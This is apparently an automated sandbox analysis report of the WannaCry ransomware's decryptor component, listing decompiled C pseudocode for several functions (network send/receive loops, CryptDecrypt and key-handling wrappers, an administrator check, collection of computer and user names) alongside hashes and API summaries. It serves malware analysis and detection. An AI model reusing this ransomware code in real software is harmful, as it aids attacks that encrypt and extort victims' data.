                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                                      0x0040d300
                                                      0x0040d308
                                                      0x0040d313
                                                      0x0040d315
                                                      0x0040d31d
                                                      0x0040d330
                                                      0x0040d335
                                                      0x0040d337
                                                      0x0040d350
                                                      0x0040d352
                                                      0x0040d3f6
                                                      0x0040d3fd
                                                      0x0040d401
                                                      0x00000000
                                                      0x0040d358
                                                      0x0040d35f
                                                      0x0040d361
                                                      0x0040d378
                                                      0x0040d37e
                                                      0x0040d3b1
                                                      0x0040d3b6
                                                      0x0040d3b9
                                                      0x0040d3bd
                                                      0x0040d3bf
                                                      0x0040d3ce
                                                      0x0040d3d5
                                                      0x0040d3db
                                                      0x0040d3de
                                                      0x0040d3e6
                                                      0x0040d3e6
                                                      0x0040d3e8
                                                      0x0040d3ef
                                                      0x00000000
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d380
                                                      0x0040d380
                                                      0x0040d38f
                                                      0x0040d39a
                                                      0x0040d39a
                                                      0x0040d39c
                                                      0x0040d3a0
                                                      0x0040d3a2
                                                      0x0040d3a9
                                                      0x00000000
                                                      0x0040d3a9
                                                      0x0040d363
                                                      0x0040d363
                                                      0x0040d36e
                                                      0x0040d403
                                                      0x0040d407
                                                      0x0040d408
                                                      0x0040d40d
                                                      0x0040d411
                                                      0x0040d414
                                                      0x0040d416
                                                      0x0040d41a
                                                      0x0040d41c
                                                      0x0040d424
                                                      0x0040d42d
                                                      0x0040d42f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d442
                                                      0x0040d445
                                                      0x0040d447
                                                      0x0040d480
                                                      0x0040d480
                                                      0x0040d486
                                                      0x00000000
                                                      0x0040d449
                                                      0x0040d449
                                                      0x0040d44f
                                                      0x0040d452
                                                      0x0040d457
                                                      0x0040d459
                                                      0x0040d460
                                                      0x0040d463
                                                      0x0040d467
                                                      0x0040d46b
                                                      0x0040d471
                                                      0x0040d471
                                                      0x0040d47d
                                                      0x0040d487
                                                      0x0040d487
                                                      0x0040d48c
                                                      0x0040d48f
                                                      0x0040d491
                                                      0x0040d420
                                                      0x00000000
                                                      0x0040d420
                                                      0x0040d491
                                                      0x0040d457
                                                      0x0040d449
                                                      0x00000000
                                                      0x0040d447
                                                      0x0040d424
                                                      0x0040d493
                                                      0x0040d493
                                                      0x0040d49a
                                                      0x0040d4a0
                                                      0x0040d4a2
                                                      0x0040d4a4
                                                      0x0040d4a6
                                                      0x0040d4a9
                                                      0x0040d4ae
                                                      0x0040d4a6
                                                      0x0040d4a2
                                                      0x0040d4bd
                                                      0x0040d4bd
                                                      0x0040d361
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d346
                                                      0x0040d346
                                                      0x0040d322
                                                      0x0040d32b
                                                      0x0040d32b

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                                      0x00404af1
                                                      0x00404afa
                                                      0x00404b04
                                                      0x00404b04
                                                      0x00404b08
                                                      0x00404b0e
                                                      0x00404b22
                                                      0x00404b2a
                                                      0x00404b2b
                                                      0x00404b3b
                                                      0x00404b49
                                                      0x00404b4d
                                                      0x00404b50
                                                      0x00404b60
                                                      0x00404b67
                                                      0x00404b2d
                                                      0x00404b2d
                                                      0x00404b38
                                                      0x00404b38
                                                      0x00404afe
                                                      0x00404b01
                                                      0x00404b01

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BED0 Relevance: 4.6, APIs: 3, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0040BED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v0;
				char _v4;
				intOrPtr _v12;
				intOrPtr _v36;
				void _v311;
				char _v312;
				char _v332;
				char _v572;
				void _v611;
				char _v612;
				intOrPtr _v616;
				long _v620;
				char _v633;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				signed int _t50;
				char _t51;
				char _t54;
				signed int _t67;
				intOrPtr _t83;

				_t29 =  *[fs:0x0];
				_t50 =  *0x422210; // 0xab4238
				_push(0xffffffff);
				_push(E0041429E);
				_push(_t29);
				 *[fs:0x0] = _t83;
				if(_t50 != 0) {
					_t29 =  *((intOrPtr*)( *_t50 + 0xc))();
					_t67 =  *0x422210; // 0xab4238
					if(_t67 != 0) {
						_t29 =  *((intOrPtr*)( *_t67))(1);
					}
				}
				_push(0x2c);
				L00412CEC();
				_v616 = _t29;
				_v4 = 0;
				if(_t29 == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040D5E0(_t29);
				}
				_v4 = 0xffffffff;
				 *0x422210 = _t30;
				if(_t30 != 0) {
					_push(_a4);
					_t32 = E0040BAF0();
					if(_t32 == 0) {
						_t51 =  *0x421798; // 0x0
						_v612 = _t51;
						memset( &_v611, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v620 = 0x12b;
						GetComputerNameA( &_v612,  &_v620);
						_t54 =  *0x421798; // 0x0
						_v312 = _t54;
						memset( &_v311, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v572 = 0;
						_v620 = 0x12b;
						GetUserNameA( &_v312,  &_v620);
						_push(8);
						_push(_a8);
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v620);
						_push(1);
						_push( &_v633);
						_v633 = _v0;
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v332);
						 *[fs:0x0] = _v36;
						return 0;
					} else {
						 *[fs:0x0] = _v12;
						return _t32 | 0xffffffff;
					}
				} else {
					 *[fs:0x0] = _v12;
					return _t30 | 0xffffffff;
				}
			}
























                                                      0x0040bed0
                                                      0x0040bed6
                                                      0x0040bedc
                                                      0x0040bede
                                                      0x0040bee3
                                                      0x0040bee4
                                                      0x0040bef3
                                                      0x0040bef7
                                                      0x0040befa
                                                      0x0040bf02
                                                      0x0040bf08
                                                      0x0040bf08
                                                      0x0040bf02
                                                      0x0040bf0a
                                                      0x0040bf0c
                                                      0x0040bf14
                                                      0x0040bf1a
                                                      0x0040bf25
                                                      0x0040bf30
                                                      0x0040bf27
                                                      0x0040bf29
                                                      0x0040bf29
                                                      0x0040bf34
                                                      0x0040bf3f
                                                      0x0040bf44
                                                      0x0040bf65
                                                      0x0040bf66
                                                      0x0040bf70
                                                      0x0040bf8a
                                                      0x0040bf92
                                                      0x0040bfa5
                                                      0x0040bfa7
                                                      0x0040bfa9
                                                      0x0040bfb5
                                                      0x0040bfb9
                                                      0x0040bfbf
                                                      0x0040bfc7
                                                      0x0040bfde
                                                      0x0040bfe0
                                                      0x0040bfe2
                                                      0x0040bfec
                                                      0x0040bff1
                                                      0x0040bff5
                                                      0x0040c009
                                                      0x0040c00b
                                                      0x0040c00e
                                                      0x0040c01a
                                                      0x0040c02a
                                                      0x0040c02c
                                                      0x0040c02f
                                                      0x0040c033
                                                      0x0040c042
                                                      0x0040c052
                                                      0x0040c05f
                                                      0x0040bf72
                                                      0x0040bf7c
                                                      0x0040bf89
                                                      0x0040bf89
                                                      0x0040bf46
                                                      0x0040bf50
                                                      0x0040bf5d
                                                      0x0040bf5d

                                                      APIs
                                                      • #823.MFC42(0000002C), ref: 0040BF0C
                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
                                                      • GetUserNameA.ADVAPI32 ref: 0040BFF5
                                                        • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
                                                        • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Name$#823??0exception@@ComputerExceptionThrowUser
                                                      • String ID:
                                                      • API String ID: 2582426243-0
                                                      • Opcode ID: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                                      • Instruction ID: 83e3db62829b85d845063e2f81586b9f479c5ffe1e9c48acb6c19853c4e1520f
                                                      • Opcode Fuzzy Hash: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                                      • Instruction Fuzzy Hash: 8541C2706087829BD720DF64D854BAB7BE4EBC8710F004A3DF599933D0DB789508CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D4C0 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0040D4C0() {
				void* __ecx;
				signed int _t17;
				intOrPtr _t19;
				signed int _t28;
				void* _t29;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				intOrPtr* _t34;
				signed int _t48;
				intOrPtr* _t50;
				signed int _t51;
				void* _t52;
				void* _t53;

				_t33 =  *(_t52 + 0x10);
				_t51 = 0;
				_t50 = _t34;
				if(_t33 != 0) {
					_t17 = E0040D5D0(_t50);
					__eflags = _t17;
					if(_t17 != 0) {
						_push(_t52 + 0xc);
						_t48 = 0;
						L0041303E();
						_t19 =  *((intOrPtr*)(_t52 + 0x14));
						_t53 = _t52 + 4;
						__eflags = _t33;
						 *((intOrPtr*)(_t53 + 0x1c)) = _t19;
						if(_t33 > 0) {
							while(1) {
								__eflags = _t19 -  *((intOrPtr*)(_t53 + 0x10)) -  *((intOrPtr*)(_t50 + 0x28));
								if(_t19 -  *((intOrPtr*)(_t53 + 0x10)) >  *((intOrPtr*)(_t50 + 0x28))) {
									goto L16;
								}
								_t28 =  *((intOrPtr*)( *_t50 + 0x24))( *((intOrPtr*)(_t50 + 4)), _t48 +  *((intOrPtr*)(_t53 + 0x18)), _t33 - _t48);
								__eflags = _t28;
								if(__eflags > 0) {
									_t48 = _t48 + _t28;
									__eflags = _t48;
									_push(_t53 + 0x1c);
									goto L15;
								} else {
									if(__eflags != 0) {
										_t29 =  *((intOrPtr*)( *_t50 + 0x28))();
										__eflags = _t29 - 0x2733;
										if(_t29 == 0x2733) {
											_t30 = _t51;
											_t51 = _t51 + 1;
											__eflags = _t30 - 0x64;
											if(_t30 > 0x64) {
												Sleep(0x64);
												_t51 = 0;
												__eflags = 0;
											}
											_push(_t53 + 0x1c);
											L15:
											L0041303E();
											_t53 = _t53 + 4;
											__eflags = _t48 - _t33;
											if(_t48 < _t33) {
												_t19 =  *((intOrPtr*)(_t53 + 0x1c));
												continue;
											}
										}
									}
								}
								goto L16;
							}
						}
						L16:
						__eflags =  *(_t53 + 0x20);
						if( *(_t53 + 0x20) != 0) {
							E0040D2B0(_t50,  *((intOrPtr*)(_t53 + 0x18)), _t48);
						}
						return _t48;
					} else {
						_t31 = _t17 | 0xffffffff;
						__eflags = _t31;
						return _t31;
					}
				} else {
					return 0;
				}
			}

















                                                      0x0040d4c2
                                                      0x0040d4c7
                                                      0x0040d4ca
                                                      0x0040d4ce
                                                      0x0040d4db
                                                      0x0040d4e0
                                                      0x0040d4e2
                                                      0x0040d4f3
                                                      0x0040d4f4
                                                      0x0040d4f6
                                                      0x0040d4fb
                                                      0x0040d4ff
                                                      0x0040d502
                                                      0x0040d504
                                                      0x0040d508
                                                      0x0040d510
                                                      0x0040d519
                                                      0x0040d51b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d532
                                                      0x0040d535
                                                      0x0040d537
                                                      0x0040d566
                                                      0x0040d566
                                                      0x0040d568
                                                      0x00000000
                                                      0x0040d539
                                                      0x0040d539
                                                      0x0040d53f
                                                      0x0040d542
                                                      0x0040d547
                                                      0x0040d549
                                                      0x0040d54b
                                                      0x0040d54c
                                                      0x0040d54f
                                                      0x0040d553
                                                      0x0040d559
                                                      0x0040d559
                                                      0x0040d559
                                                      0x0040d55f
                                                      0x0040d569
                                                      0x0040d569
                                                      0x0040d56e
                                                      0x0040d571
                                                      0x0040d573
                                                      0x0040d50c
                                                      0x00000000
                                                      0x0040d50c
                                                      0x0040d573
                                                      0x0040d547
                                                      0x0040d539
                                                      0x00000000
                                                      0x0040d537
                                                      0x0040d510
                                                      0x0040d575
                                                      0x0040d579
                                                      0x0040d57b
                                                      0x0040d585
                                                      0x0040d585
                                                      0x0040d591
                                                      0x0040d4e6
                                                      0x0040d4e6
                                                      0x0040d4e6
                                                      0x0040d4eb
                                                      0x0040d4eb
                                                      0x0040d4d2
                                                      0x0040d4d6
                                                      0x0040d4d6

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                                      • Instruction ID: 4ffb44c4908fbcdbada2a4de5981d2af022f8853c63cab2f762cb5961de049d3
                                                      • Opcode Fuzzy Hash: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                                      • Instruction Fuzzy Hash: B121B172B042016FC314DF99AC84C6BB399EBD8358B104A3FF946D7381DA35DC09879A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401BB0 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00401BB0() {
				char _v3;
				char _v4;
				char _v5;
				char _v6;
				char _v7;
				struct _SID_IDENTIFIER_AUTHORITY _v8;
				void* _v12;
				char _v16;
				void* _v24;
				long _v28;
				int _t16;
				void* _t17;

				_v8.Value = 0;
				_v7 = 0;
				_v6 = 0;
				_v5 = 0;
				_v4 = 0;
				_v3 = 5;
				_v16 = 0;
				_t16 = AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t16 != 0) {
					_t17 = _v12;
					__imp__CheckTokenMembership(0, _t17,  &_v16);
					if(_t17 == 0) {
						_v28 = 0;
					}
					FreeSid(_v24);
					return _v28;
				} else {
					return _t16;
				}
			}















                                                      0x00401bcf
                                                      0x00401bd3
                                                      0x00401bd7
                                                      0x00401bdb
                                                      0x00401bdf
                                                      0x00401be3
                                                      0x00401be8
                                                      0x00401bec
                                                      0x00401bf4
                                                      0x00401bfb
                                                      0x00401c06
                                                      0x00401c0e
                                                      0x00401c10
                                                      0x00401c10
                                                      0x00401c19
                                                      0x00401c27
                                                      0x00401bfa
                                                      0x00401bfa
                                                      0x00401bfa

                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
                                                      • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                                      • Instruction ID: 94521974df2238a1dc1099b42d01a28c9688a26bfb2bc835d8f4af5c6999d558
                                                      • Opcode Fuzzy Hash: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                                      • Instruction Fuzzy Hash: 3E012C71148380BFE340DB6888C4AABBFE8EBD4704FC4985DF58543252D234D848DB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404770 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404770(void* __ecx) {
				long* _t7;
				long* _t8;
				long* _t9;
				void* _t15;

				_t15 = __ecx;
				_t7 =  *(__ecx + 8);
				if(_t7 != 0) {
					CryptDestroyKey(_t7);
					 *(_t15 + 8) = 0;
				}
				_t8 =  *(_t15 + 0xc);
				if(_t8 != 0) {
					CryptDestroyKey(_t8);
					 *(_t15 + 0xc) = 0;
				}
				_t9 =  *(_t15 + 4);
				if(_t9 != 0) {
					CryptReleaseContext(_t9, 0);
					 *(_t15 + 4) = 0;
				}
				return 1;
			}







                                                      0x00404771
                                                      0x00404773
                                                      0x00404778
                                                      0x0040477b
                                                      0x00404781
                                                      0x00404781
                                                      0x00404788
                                                      0x0040478d
                                                      0x00404790
                                                      0x00404796
                                                      0x00404796
                                                      0x0040479d
                                                      0x004047a2
                                                      0x004047a7
                                                      0x004047ad
                                                      0x004047ad
                                                      0x004047ba

                                                      APIs
                                                      • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                                      • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                                      • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Destroy$ContextRelease
                                                      • String ID:
                                                      • API String ID: 1308222791-0
                                                      • Opcode ID: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                                      • Instruction ID: 61d89c14c75fb5affeedc9811425020a0caf5e5d08399d1baa26ca37d3ca979d
                                                      • Opcode Fuzzy Hash: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                                      • Instruction Fuzzy Hash: 22E0EDB03007018BD7309F65D888B4377E8AF84714F04882DF85AE77D0C778E8408B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A9D0 Relevance: 3.3, APIs: 2, Instructions: 315COMMONCrypto
                                                      Download Yara Rule
